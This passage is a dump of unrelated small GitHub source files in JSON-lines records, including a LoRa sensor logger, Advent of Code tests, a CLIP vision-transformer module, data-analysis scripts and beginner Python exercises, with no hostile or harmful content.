date):\n payload_data = bytearray()\n battery_lvl = 0\n light_lvl = 0\n dev_timestamp = 0\n if port == 4:\n payload_data = payload\n elif port == 2 or port == 8:\n dev_timestamp = int.from_bytes(payload[0:4], byteorder='big')\n battery_lvl = int.from_bytes(payload[4:5], byteorder='big')\n light_lvl = int.from_bytes(payload[5:6], byteorder='big')\n temperature = int.from_bytes(payload[6:7], byteorder='big', signed=True)\n payload_data = payload[7:]\n directory = 'Logs '+str(dev_id)\n final_directory = os.path.join(current_directory, (r''+directory))\n if not os.path.exists(final_directory):\n os.makedirs(final_directory)\n servertime = int(dp.parse(str(Metadata[0])).timestamp())\n try:\n Log = open(directory+\"/Logs \"+date+\".csv\",'x')\n Last_line = open(directory+\"/last_line.txt\",'x')\n Last_line.close()\n Last_line = open(directory+\"/last_line.txt\",'w+')\n temp_line = Last_line.read()\n templist = []\n if port == 2 or port == 8:\n templist.append(battery_lvl)\n templist.append(light_lvl)\n templist.append(temperature)\n try:\n for i in range(0, len(payload_data), 2):\n templist.append(int.from_bytes(payload_data[(i):(i+2)], byteorder='big', signed=True))\n except (ValueError, IndexError):\n for i in range(0, len(payload_data), 2):\n templist.append(int.from_bytes(payload_data[(i):(i+2)], byteorder='big', signed=True))\n line = dumps(templist)\n line = line[1:len(line)-1].replace(\" \",\"\")\n if temp_line != line:\n Last_line.write(line)\n if port == 2 or port == 8:\n templist.insert(0, port)\n templist.insert(1, servertime)\n templist.insert(2, dev_timestamp)\n line = dumps(templist)\n line = line[1:len(line)-1].replace(\" \",\"\")\n if port != 4: \n line = line\n else:\n line = \",\" + line\n Log.write(line)\n Log.close()\n Last_line.close()\n except FileExistsError:\n Log = open(directory+\"/Logs \"+date+\".csv\",'a')\n Last_line = open(directory+\"/last_line.txt\",'r')\n temp_line = 
Last_line.read()\n Last_line.close()\n templist = []\n if port == 2 or port == 8:\n templist.append(battery_lvl)\n templist.append(light_lvl)\n templist.append(temperature)\n try:\n for i in range(0, len(payload_data), 2):\n templist.append(int.from_bytes(payload_data[(i):(i+2)], byteorder='big', signed=True))\n except (ValueError, IndexError):\n for i in range(0, len(payload_data), 2):\n templist.append(int.from_bytes(payload_data[(i):(i+2)], byteorder='big', signed=True))\n line = dumps(templist)\n line = line[1:len(line)-1].replace(\" \",\"\")\n if temp_line != line:\n Last_line = open(directory+\"/last_line.txt\",'w')\n Last_line.write(line)\n Last_line.close()\n if port == 2 or port == 8:\n templist.insert(0, port)\n templist.insert(1,servertime)\n templist.insert(2, dev_timestamp)\n line = dumps(templist)\n line = line[1:len(line)-1].replace(\" \",\"\")\n if port != 4: \n line = \"\\n\" + line\n else:\n line = \",\" + line\n Log.write(line)\n Log.close()\n\n\n\n\n\nsome_date = \"21.12.2018\"\n#Metadata format:\n\nmeta = [\"2018-11-08T11:41:52.772067729Z\", 868.1, \"LORA\", \"SF12BW125\", 1155072000, \"4/5\", [\n[\"trt-vm-loragw01\", True, 1040756148, \"2018-11-08T11:39:10Z\", 0, -120, -8.75, 1, 63.42883, 10.385698, 20], \n[\"trt-sluppen-loragw01\", True, 1338177276, \"2018-11-08T11:39:43Z\", 0, -114, 2.75, 1, 63.397568, 10.400948, 21], \n[\"trt-samf-loragw01\", True, 1567384756, \"2018-11-08T12:02:07Z\", 0, -111, 3.5, 1, 63.422485, 10.395755, 20], \n[\"eui-008000000000a447\", False,1628454124, \"2018-11-08T13:04:42.647744Z\", 0, -119, -13.8, 0, 63.41785, 10.4021, 112],\n[\"trt-olav-loragw01\", True, 3798105164, \"2018-11-08T11:40:27Z\", 0, -117, -14.25, 1, 63.43338, 10.403285, 19], \n[\"ntnu1\", True, 2597174828, \"2018-11-08T11:41:52Z\", 0, -119, -15, 1, 63.41831, 10.400998, 60, \"registry\"]]\n]\n\n#WritePayloadDataToFile(\"lorakeypad\", testpayload, meta, some_date)\n#WritePayloadDataToFile(\"lorakeypad\", testpayload, meta, some_date)\n","repo_name":"tobulf/Master2019_TTN-server","sub_path":"Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":4985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29682203536","text":"import os, glob, sys\n\ndef ecrire(liste):\n fichier = \"liste.txt\"\n print(\"Ecriture dans le fichier '{}'...\".format(fichier))\n with open(fichier, 'w') as f:\n for item in liste:\n f.write(item)\n f.write(\"\\n\")\n print(\"OK!\")\n\ndef main():\n if len(sys.argv) != 2:\n print(\"Usage : listwriter2 /dossier\")\n sys.exit()\n else:\n ext = input(\"Type d'extention : \")\n chemin = str(sys.argv[1])+\"**/*\"\n print(chemin)\n liste = glob.glob(chemin+ext,recursive=True)\n ecrire(liste) \n\nif __name__==\"__main__\":\n main()\n","repo_name":"TuxStory/Python3","sub_path":"listevwriter2.py","file_name":"listevwriter2.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"22556452785","text":"import numpy as np\nimport pytest\nfrom classes_functions import BinaryArray, BinaryConverter, invert\nfrom classes_functions import find_scrubber_number\ndef test():\n A = np.array([0,1,0,0,1])\n B = BinaryConverter(A)\n assert B.decimal == 9\n\n\ndef test_invert():\n B = invert(np.array([0,1,0,0,1]))\n C = BinaryConverter(B)\n assert C.decimal == 22\n\nclass TestSecondStar():\n def setup(self):\n self.A = [\n '00100',\n '11110',\n '10110',\n '10111',\n '10101',\n '01111',\n '00111',\n '11100',\n 
'10000',\n            '11001',\n            '00010',\n            '01010'\n        ]\n\n    def test_binary_array(self):\n        self.setup()\n        BinArr = BinaryArray(self.A, do_invert=False)\n        result3 = np.array([1, 0, 1, 1, 1])\n        \n        for i in range(5):\n            assert BinArr.binary_array[3, i] == result3[i]\n\n    def test_o2_rating(self):\n        self.setup()\n        BinArr = BinaryArray(self.A)\n        \n        scrubber = find_scrubber_number(BinArr) \n\n        result = np.array([1,0,1,1,1])\n        \n        for i in range(5):\n            assert scrubber[i] == result[i]\n    \n    def test_co2_rating(self):\n        self.setup()\n        BinArr = BinaryArray(self.A, do_invert=True)\n\n        scrubber = find_scrubber_number(BinArr) \n\n        result = np.array([0,1,0,1,0])\n        \n        for i in range(5):\n            assert scrubber[i] == result[i]\n# oxygen_rating = BinaryConverter(oxygen_rating_binary).decimal  # leftover commented out: oxygen_rating_binary is never defined, so this line raised a NameError on import\n","repo_name":"MatKie/AdventOfCode2021","sub_path":"3/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"37149016837","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score, make_scorer\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.utils import shuffle\nimport matplotlib.pyplot as plt\n\nshow_server = 1\nif show_server:\n    name = \"server\"\nelse: \n    name = \"client\"\n\n'''\nmaxpool columns= \"maxpool_N\", \"maxpool_H\", \"maxpool_W\", \"maxpool_C\", \"maxpool_ksizeH\", \"maxpool_ksizeW\", \n                 \"maxpool_zPadHLeft\", \"maxpool_zPadHRight\", \"maxpool_zPadWLeft\", \"maxpool_zPadWRight\",\n                 \"maxpool_strideH\", \"maxpool_strideW\", \"maxpool_N1\", \n                 \"maxpool_imgH\", \"maxpool_imgW\", \"maxpool_C1\", 'time_cost'\n'''\nlayer_filepath = \"/home/eloise/eloise/script/analysis/per_layer_onlyTime/dataset/maxpool_onlyTime_\" + name + \".csv\"\ndf = pd.read_csv(layer_filepath, delimiter=\"\\s+\")\n\n\n\n\n# print(df.head(10))\n# X = df.loc[:, [\"maxpool_N\", \"maxpool_H\", \"maxpool_W\", \"maxpool_C\", \"maxpool_ksizeH\", \"maxpool_ksizeW\"]]\n\n### Process on dataset\n# print(\"*** Number of data before processing: \", df.size)\n# df = df[(df['time_cost'] > 0) &(df['time_cost'] < 20000)]\n# print(\"*** Number of data after processing: \", df.size)\n\n### Training and testing\nX = pd.DataFrame()\nmp_H_output = (df['maxpool_H'] + df[\"maxpool_zPadHLeft\"] + df[\"maxpool_zPadHRight\"] - df[\"maxpool_ksizeH\"]) / df[\"maxpool_strideH\"] + 1\nmp_W_output = (df['maxpool_W'] + df[\"maxpool_zPadWLeft\"] + df[\"maxpool_zPadWRight\"] - df[\"maxpool_ksizeW\"]) / df[\"maxpool_strideW\"] + 1\n\n'''physical operations'''\nX['FLOPs'] = (df[\"maxpool_ksizeH\"] * df[\"maxpool_ksizeW\"]) * (mp_H_output * mp_W_output) * df[\"maxpool_C\"]\n# sizeof(uint64_t) is unsigned 64-bit integer -> 8 bytes\nX['IN_MACs'] = (df['maxpool_H'] * df['maxpool_W']) * df[\"maxpool_C\"] * 8\nX['OUT_MACs'] = (mp_H_output * mp_W_output) * df[\"maxpool_C\"] * 8\n\ny = df['time_cost']\n\n# Define a custom function to calculate max difference\ndef max_difference(values):\n    return max(values) - min(values)\n\n# Group by the specified columns and aggregate 'time_cost'\ngrouped_df = df.groupby([\"maxpool_N\", \"maxpool_H\", \"maxpool_W\", \"maxpool_C\", \"maxpool_ksizeH\", \"maxpool_ksizeW\", \n                         \"maxpool_zPadHLeft\", \"maxpool_zPadHRight\", \"maxpool_zPadWLeft\", \"maxpool_zPadWRight\",\n                         \"maxpool_strideH\", \"maxpool_strideW\", \"maxpool_N1\", 
\n \"maxpool_imgH\", \"maxpool_imgW\", \"maxpool_C1\"])['time_cost'].agg([list, max_difference]).reset_index()\n\n# Rename the columns for better clarity\ngrouped_df = grouped_df.rename(columns={'list': 'time_cost_list', 'max_difference': 'max_time_cost_difference'})\n\n# Save the grouped DataFrame as a CSV file\ngrouped_df.to_csv('grouped_maxpool.csv', index=False)","repo_name":"Eloise2000/SNNI-Performance-Evaluator","sub_path":"analysis/per_layer_onlyTime/predict_regression/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"115722277","text":"\r\nfrom collections import OrderedDict\r\nfrom typing import Tuple, Union\r\n\r\nimport hashlib\r\nimport os\r\nimport urllib\r\nimport warnings\r\nfrom tqdm import tqdm\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch import nn\r\n\r\nclass LayerNorm(nn.LayerNorm):\r\n \"\"\"Subclass torch's LayerNorm to handle fp16.\"\"\"\r\n\r\n def forward(self, x: torch.Tensor):\r\n orig_type = x.dtype\r\n ret = super().forward(x.type(torch.float32))\r\n return ret.type(orig_type)\r\n\r\n\r\nclass QuickGELU(nn.Module):\r\n def forward(self, x: torch.Tensor):\r\n return x * torch.sigmoid(1.702 * x)\r\n\r\n\r\nclass ResidualAttentionBlock(nn.Module):\r\n def __init__(self, d_model: int, n_head: int, attn_mask=None):\r\n super().__init__()\r\n\r\n self.attn = nn.MultiheadAttention(d_model, n_head)\r\n self.ln_1 = LayerNorm(d_model)\r\n self.mlp = nn.Sequential(OrderedDict([\r\n (\"c_fc\", nn.Linear(d_model, d_model * 4)),\r\n (\"gelu\", QuickGELU()),\r\n (\"c_proj\", nn.Linear(d_model * 4, d_model))\r\n ]))\r\n self.ln_2 = LayerNorm(d_model)\r\n self.attn_mask = attn_mask\r\n\r\n def attention(self, x: torch.Tensor):\r\n attn_mask_ = self.attn_mask\r\n if self.attn_mask is not None and hasattr(self.attn_mask, '__call__'):\r\n attn_mask_ = self.attn_mask(x.size(0)) # LND\r\n\r\n attn_mask_ = attn_mask_.to(dtype=x.dtype, device=x.device) if attn_mask_ is not None else None\r\n return self.attn(x, x, x, need_weights=False, attn_mask=attn_mask_)[0]\r\n\r\n def forward(self, x):\r\n x = x + self.attention(self.ln_1(x))\r\n x = x + self.mlp(self.ln_2(x))\r\n return x\r\n\r\n\r\nclass Transformer(nn.Module):\r\n def __init__(self, width: int, layers: int, heads: int, attn_mask = None):\r\n super().__init__()\r\n self.width = width\r\n self.layers = layers\r\n self.resblocks = nn.Sequential(*[ResidualAttentionBlock(width, heads, attn_mask) for _ in range(layers)])\r\n\r\n def forward(self, x: torch.Tensor):\r\n return self.resblocks(x)\r\n\r\nclass VisionTransformer(nn.Module):\r\n def __init__(self, input_resolution: int, patch_size: int, width: int, layers: int, heads: int):\r\n super().__init__()\r\n self.input_resolution = input_resolution\r\n\r\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=width, kernel_size=patch_size, stride=patch_size, bias=False)\r\n\r\n scale = width ** -0.5\r\n self.class_embedding = nn.Parameter(scale * torch.randn(width))\r\n self.positional_embedding = nn.Parameter(scale * torch.randn((input_resolution // patch_size) ** 2 + 1, width))\r\n self.ln_pre = LayerNorm(width)\r\n self.transformer = Transformer(width, layers, heads)\r\n self.ln_post = LayerNorm(width)\r\n self.proj = nn.Parameter(scale * torch.randn(width, 512))\r\n\r\n\r\n\r\n def forward(self, x: torch.Tensor):\r\n\r\n x = self.conv1(x) # shape = [*, width, grid, grid]\r\n\r\n x = x.reshape(x.shape[0], x.shape[1], -1) # 
shape = [*, width, grid ** 2]\r\n x = x.permute(0, 2, 1) # shape = [*, grid ** 2, width]\r\n x = torch.cat([self.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), x], dim=1) # shape = [*, grid ** 2 + 1, width]\r\n x = x + self.positional_embedding.to(x.dtype)\r\n x = self.ln_pre(x)\r\n\r\n x = x.permute(1, 0, 2) # NLD -> LND\r\n x = self.transformer(x)\r\n x = x.permute(1, 0, 2) # LND -> NLD\r\n x = self.ln_post(x)\r\n return x\r\n\r\nclass CLIP(nn.Module):\r\n def __init__(self, input_resolution: int, patch_size: int, width: int, layers: int, heads: int):\r\n super().__init__()\r\n\r\n self.visual = VisionTransformer(input_resolution, patch_size, width, layers, heads)\r\n\r\n self.transformer = Transformer(\r\n width=512,\r\n layers=12,\r\n heads=8,\r\n attn_mask=self.build_attention_mask\r\n )\r\n\r\n\r\n def build_attention_mask(self, context_length):\r\n # lazily create causal attention mask, with full attention between the vision tokens\r\n # pytorch uses additive attention mask; fill with -inf\r\n mask = torch.zeros(context_length, context_length)\r\n mask.fill_(float(\"-inf\"))\r\n mask.triu_(1) # zero out the lower diagonal\r\n mask = mask.to(self.dtype)\r\n return mask\r\n\r\n\r\n\r\n\r\n def encode_image(self, image, return_hidden=False):\r\n\r\n hidden = self.visual(image)\r\n #hidden = hidden @ self.visual.proj\r\n\r\n #x = hidden[:, 0, :]\r\n\r\n x = hidden\r\n if return_hidden:\r\n return x, hidden\r\n\r\n return x\r\n\r\n def forward(self, image):\r\n image_features = self.encode_image(image)\r\n #text_features = self.encode_text(text)\r\n\r\n return image_features\r\n # normalized features\r\n #image_features = image_features / image_features.norm(dim=-1, keepdim=True)\r\n #text_features = text_features / text_features.norm(dim=-1, keepdim=True)\r\n\r\n # cosine similarity as logits\r\n #logit_scale = self.logit_scale.exp()\r\n #logits_per_image = logit_scale * image_features @ text_features.t()\r\n #logits_per_text = logit_scale * text_features @ image_features.t()\r\n\r\n # shape = [global_batch_size, global_batch_size]\r\n #return logits_per_image, logits_per_text","repo_name":"MrZihan/GridMM","sub_path":"preprocess/model_clip.py","file_name":"model_clip.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"48"} +{"seq_id":"17236905236","text":"\"\"\"\n10: На столе лежат n монеток. Некоторые из них лежат вверх решкой, а некоторые – гербом. \nОпределите минимальное число монеток, которые нужно перевернуть, чтобы все монетки были \nповернуты вверх одной и той же стороной. Выведите минимальное количество монет, которые нужно перевернуть\n\"\"\"\nimport random \n\ncoin = int(input('Введите количество монеток: '))\nside_coin = 0\nreshka = orel = 0\n\nfor i in range(coin):\n side_coin = random.randint(0, 1)\n print(side_coin, end=\" \")\n if side_coin == 0:\n reshka += 1\n else:\n orel += 1\nif reshka == 0 or orel == 0:\n print(f'\\nМонет: {coin}, решка: {reshka}, орел: {orel}. Переворачивать нечего.')\nelif reshka < orel:\n print(f'\\nМонет: {coin}, решка: {reshka}, орел: {orel}. Перевернём наименьшее количество решек: {reshka}')\nelse:\n print(f'\\nМонет: {coin}, решка: {reshka}, орел: {orel}. 
Перевернём наименьшее количество орлов: {orel}')\n","repo_name":"bubaleh1337/python_course.GB","sub_path":"seminars/sem2/hw/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74380718225","text":"import pyspark.sql.functions as F\nfrom pyspark.sql import SparkSession\n\nspark = SparkSession.builder \\\n .master(\"local[1]\") \\\n .appName(\"SparkByExamples.com\") \\\n .getOrCreate()\ndf = spark.range(500).toDF(\"number\").filter(\"number < 600\").withColumn(\"mod_val\", F.col(\"number\") % 100)\ndf.explain(extended=True)\n\nfrom pyspark.sql import Row\nfrom pyspark.sql.types import StructField, StructType, StringType, LongType\nmyManualSchema = StructType([\nStructField(\"some\", StringType(), True),\nStructField(\"col\", StringType(), True),\nStructField(\"names\", LongType(), False)\n])\nmyRow = Row(\"Hello\", None, 1)\nmyDf = spark.createDataFrame([myRow], myManualSchema)\nmyDf.show()\n","repo_name":"charantej224/spark_demystified","sub_path":"spark_analyzer/plan_details.py","file_name":"plan_details.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73744515987","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 23 13:59:37 2020\r\n\r\n@author: Tyler\r\n\"\"\"\r\n\r\n#importing modules for project\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nimport math\r\n\r\n#loading train and test data to dataframes\r\ntrain = pd.read_csv(r'C:\\Users\\Tyler\\Desktop\\Projects\\Kaggle\\New York Taxi Fare Prediction\\train.csv')\r\ntest = pd.read_csv(r'C:\\Users\\Tyler\\Desktop\\Projects\\Kaggle\\New York Taxi Fare Prediction\\test.csv')\r\n\r\n#creation of rmse to match with kaggle scoring\r\ndef rmse(predictions, targets):\r\n return np.sqrt(((predictions - targets) ** 2).mean())\r\n\r\n#creation of hour columns from pickup_datetime\r\ntrain['pickup_datetime'] = pd.to_datetime(train['pickup_datetime'])\r\ntest['pickup_datetime'] = pd.to_datetime(test['pickup_datetime'])\r\ntrain['hour'] = train['pickup_datetime'].dt.hour\r\ntest['hour'] = test['pickup_datetime'].dt.hour\r\n\r\n#function for calculating distance based off of dropoff/pickup lat/longs\r\ndef haversine(lat_start, long_start, lat_end, long_end):\r\n \r\n #radius of the Earth\r\n R = 6373.0\r\n \r\n #lat-long coordinates\r\n lat1 = math.radians(lat_start)\r\n long1 = math.radians(long_start)\r\n lat2 = math.radians(lat_end)\r\n long2 = math.radians(long_end)\r\n \r\n #change in coordinates\r\n d_lat = lat2 - lat1\r\n d_long = long2 - long1\r\n \r\n #haversine formula\r\n a = math.sin(d_lat / 2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(d_long / 2)**2\r\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\r\n distance = R * c\r\n return(distance)\r\n\r\n#adding distance columns to train/test datasets\r\ntest['distance'] = test.apply(lambda row:\r\n haversine(row['pickup_latitude'], row['pickup_longitude'], row['dropoff_latitude'], row['dropoff_longitude']),\r\n axis=1)\r\ntrain['distance'] = train.apply(lambda row:\r\n haversine(row['pickup_latitude'], row['pickup_longitude'], row['dropoff_latitude'], row['dropoff_longitude']),\r\n axis=1)\r\n\r\n#creating validation set from training data\r\nvalidation_train, validation_test = train_test_split(train,\r\n test_size = 0.3,\r\n random_state = 
123)\r\n","repo_name":"tylerfeese/Kaggle-Submissions","sub_path":"TaxiFare.py","file_name":"TaxiFare.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"25115839834","text":"PLOTTING=False\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n# Read the data\ndf=pd.read_csv(\"Cristae Thickness.csv\").astype('float64')\n\nfor tissue_prep in ['Intact', 'Permeabilised']:\n\tx=df['Temperature'].to_numpy()\n\ty=df[tissue_prep].to_numpy()\n\n\ttck = interpolate.splrep(x, y, k=2, s=0)\n\txnew = np.linspace(x.min(), x.max())\n\n\t# Locate the turning point from the second derivative (needed below even when not plotting)\n\tdev_2 = interpolate.splev(x, tck, der=2)\n\tturning_point_mask = dev_2 == np.amax(dev_2)\n\n\t# Plot the data\n\tif PLOTTING is True:\n\t\tfig, axes = plt.subplots(3)\n\n\t\taxes[0].plot(x, y, 'x', label = 'data')\n\t\taxes[1].plot(x, interpolate.splev(x, tck, der=1), label = '1st dev')\n\t\taxes[2].plot(x, dev_2, label = '2nd dev')\n\n\t\taxes[2].plot(x[turning_point_mask], dev_2[turning_point_mask],'rx',\n\t             label = 'Turning point')\n\t\tfor ax in axes:\n\t\t    ax.legend(loc = 'best')\n\n\t\tplt.show()\n\t\t\n\tprint(f\"{tissue_prep} break point: {x[turning_point_mask]}\")\n\n","repo_name":"julio0029/Science","sub_path":"Segmented_regressio.py","file_name":"Segmented_regressio.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"43587440305","text":"# Name: Michael Zonneveld\n# Studentnumber: 11302984\n\nimport csv\nimport json\n\n# setting keys for indexing later on \nfieldnames = (\"year\",\"num_parts_MEAN\")\n\n# read the csv file\nwith open('11302984_legofile.csv') as csv_f:\n    reader = csv.DictReader(csv_f, fieldnames)\n    rows = list(reader)\n\n# write to json file, making it a dict\nwith open('11302984_legofile.json', 'w') as json_f:\n    json_f.write('{\"stats\":' )\n    json.dump(rows, json_f)\n    json_f.write('}')\n","repo_name":"michaelzon/dataprocessing","sub_path":"homework/week_3/convertCSV2JSON.py","file_name":"convertCSV2JSON.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"35783981710","text":"def percentile_score(marks_list, yourmark):\n\n    # Get number of students who scored less than your marks \n    less_than_yourmark = len([mark for mark in marks_list if mark < yourmark])\n\n    # Calculate the percentile score\n    total_students = len(marks_list)\n    percentile = (less_than_yourmark / total_students) * 100\n\n    return percentile\n\nmarks = [800, 300, 950, 760, 680, 490, 640]\nyourmark = 760\npercentile = percentile_score(marks, yourmark)\nprint(f'Percentile score for {yourmark} marks is {percentile: ,.2f}')\n","repo_name":"alifiyakapasi07/CodeGenie_2023","sub_path":"problem-solution/CalculatePercentileScore.py","file_name":"CalculatePercentileScore.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"7542325463","text":"# -*- coding: utf-8 -*-\n#simple interest\ndef si(p,t,r):\n    res=(p*t*r)/100\n    return res\np=int(input(\"Enter the p\\n\"))\nt=int(input(\"Enter the t\\n\"))\nr=int(input(\"Enter the r\\n\"))\nres=si(p,t,r)\nprint(res)\n\n#prime\nnum1=int(input(\"Enter Num1\"))\nnum2=int(input(\"Enter Num2\"))\nfor i in range(num1,num2+1):\n    if i>1:\n        for n in range(2,i):\n            if(i%n)==0:\n                break\n        else:\n            
print(i)\n \n#fseries\nnum=int(input(\"Enter the number\"))\ndef fs(num):\n if num<=1:\n return num\n else:\n return (fs(num-1)+fs(num-2))\nfor i in range(num):\n print(fs(i))\n\n#Electric\ncon=int(input(\"Enter the consumption\\n\"))\nif con<=100:\n print(\"Rate per unit rupees is \",2*con)\nelif con>100 and con<=200:\n print(\"Rate per unit rupees is \",3*con)\nelif con>200 and con<=300:\n print(\"Rate per unit rupees is \",5*con)\nelse:\n print(\"Rate per unit rupees is \",6*con)\n\n ","repo_name":"Nyrikabr/pythonassignment","sub_path":"Assignment1.py","file_name":"Assignment1.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17501114260","text":"import requests\n\nr = requests.get(\"https://cloud.hakka.gov.tw/Pub/Opendata/DTST20171100025.json\")\nlist_data = r.json()[\"NewDataSet\"][\"Table\"]\n\nfp= open(\"data_20211021.csv\", \"w\")\n\nhead = \"\"\nfor key in list_data[0]:\n head = head + str(key) + \",\"\nfp.write(head)\n\nfor i in list_data:\n data = \"\"\n for key in i:\n data += str(i[key]) + \",\"\n data += \"\\n\"\n fp.write(data)\n \n\nfp.close()\n \n","repo_name":"fannykong102/110_1Spider","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4698815093","text":"#coding=utf-8\r\n'''\r\nCreated on 2018-06-06\r\n\r\n@author: wenhaohu\r\n\r\n使用synonyms,去近义词或者语义相同的词\r\n\r\n使用的技术:word2vec计算语义相似度;\r\n使用编辑距离计算两个词的相似度;\r\n\r\n'''\r\nimport synonyms\r\n\r\n#展示近义词,调试用\r\nsynonyms.display(\"楼盘\")\r\n\r\n#计算指定的两个词近似度\r\n#默认对输入的两个待计算串进行分词\r\nr = synonyms.compare(\"你好明天\", \"明天很不好\", seg=True)\r\nprint(r)\r\n\r\n#计算某个词的近词,list返回\r\nwordSimList = synonyms.nearby(\"美铝\")\r\nprint(wordSimList)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"chlyzzo/DeepLearnings","sub_path":"nlpRelates/usesynonyms.py","file_name":"usesynonyms.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2814246819","text":"def block_shifting(matrix):\n result = [[0 for _ in range(8)] for _ in range(8)]\n for i in range(8):\n for j in range(8):\n result[i][j] = matrix[7 - i][7 - j] - 128 # Subtrair 128 para obter os valores negativos\n return result\n\n# Entrada da matriz\nmatrix = []\nfor _ in range(8):\n row = list(map(int, input().split()))\n matrix.append(row)\n\n# Aplicar o algoritmo de block shifting\nresult = block_shifting(matrix)\ninverted_matrix = [row[::-1] for row in result[::-1]]\n\n# Imprimir a matriz resultante\nfor row in inverted_matrix:\n print(' '.join(map(str, row)))\n","repo_name":"camillacorreia/listas-sistemas-multimidia","sub_path":"block-shifting.py","file_name":"block-shifting.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24984651154","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRun disaggregation for all selected appliances\n\"\"\"\nfrom __future__ import print_function\nimport os.path\nimport sys\n\nsys.path.append(os.path.join(os.path.join(os.path.dirname(__file__), '..'), '..'))\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nselect_gpu = 0\nmem_limit = 2500\n# tf train setup\nimport tensorflow as tf\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n # Create 2 virtual GPUs with 1GB memory each\n try:\n 
tf.config.experimental.set_visible_devices(gpus[select_gpu], 'GPU')\n tf.config.experimental.set_memory_growth(gpus[select_gpu], True)\n tf.config.experimental.set_virtual_device_configuration(\n gpus[select_gpu],\n [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=mem_limit)])\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPU,\", len(logical_gpus), \"Logical GPUs\")\n except RuntimeError as e:\n # Virtual devices must be set before GPUs have been initialized\n print(e)\n\nimport pandas as pd\nimport importlib\nimport logging\nimport time\nfrom utils.utils import convert_to_datetime\nfrom config import default_models\nimport platform\nfrom utils.edge_detection import event_detection\n\n\nlogging.basicConfig(format='%(asctime)s %(message)s')\nlogger = logging.getLogger(__name__)\n\n_module_names = {\n 'AIR_CONDITIONER': 'air_conditioner_classifier',\n 'BASE_LOAD': 'base_load_classifier',\n 'DISHWASHER': 'dishwasher_classifier',\n 'DRYER': 'dryer_classifier',\n 'ELECTRIC_VEHICLE': 'electric_vehicle_classifier',\n 'HEATING': 'heating_classifier',\n 'REFRIGERATOR': 'refrigerator_classifier',\n 'WASHING_MACHINE': 'washing_machine_classifier',\n\n}\n\n_classifier_names = {\n 'AIR_CONDITIONER': 'AirConditionerClassifier',\n 'BASE_LOAD': 'BaseLoadClassifier',\n 'DISHWASHER': 'DishwasherClassifier',\n 'DRYER': 'DryerClassifier',\n 'ELECTRIC_VEHICLE': 'ElectricVehicleClassifier',\n 'HEATING': 'HeatingClassifier',\n 'REFRIGERATOR': 'RefrigeratorClassifier',\n 'WASHING_MACHINE': 'WashingMachineClassifier',\n}\n\napp_name = {\n 'AIR_CONDITIONER': 'AirConditioner',\n 'BASE_LOAD': 'BaseLoad',\n 'DISHWASHER': 'Dishwasher',\n 'DRYER': 'Dryer',\n 'ELECTRIC_VEHICLE': 'ElectricVehicle',\n 'HEATING': 'Heating',\n 'REFRIGERATOR': 'Refrigerator',\n 'WASHING_MACHINE': 'WashingMachine',\n}\n\n\nclass Disaggregator(object):\n\n def __init__(self):\n\n self.models_dir = './models'\n self.default_appliance_model_dict = default_models\n self.appliance_classifier_dict = {} # {Key: appliance name, Value: Classifier Object}\n\n self.log = logging.getLogger(__name__)\n self.log.setLevel(logging.DEBUG)\n 